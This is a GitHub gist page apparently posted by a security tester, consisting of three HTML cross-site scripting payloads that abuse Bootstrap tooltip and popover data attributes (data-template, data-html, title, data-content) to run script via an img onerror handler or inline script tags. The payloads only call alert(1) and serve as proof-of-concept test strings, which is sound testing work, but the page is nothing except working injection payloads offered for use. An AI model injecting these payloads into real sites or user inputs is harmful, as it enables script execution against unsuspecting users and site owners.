Skip to content

Instantly share code, notes, and snippets.

@try3hacker
Last active December 23, 2019 11:05
Show Gist options
  • Save try3hacker/1b4a59bb1e33fc72f3a89d3096180408 to your computer and use it in GitHub Desktop.
Save try3hacker/1b4a59bb1e33fc72f3a89d3096180408 to your computer and use it in GitHub Desktop.
<x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment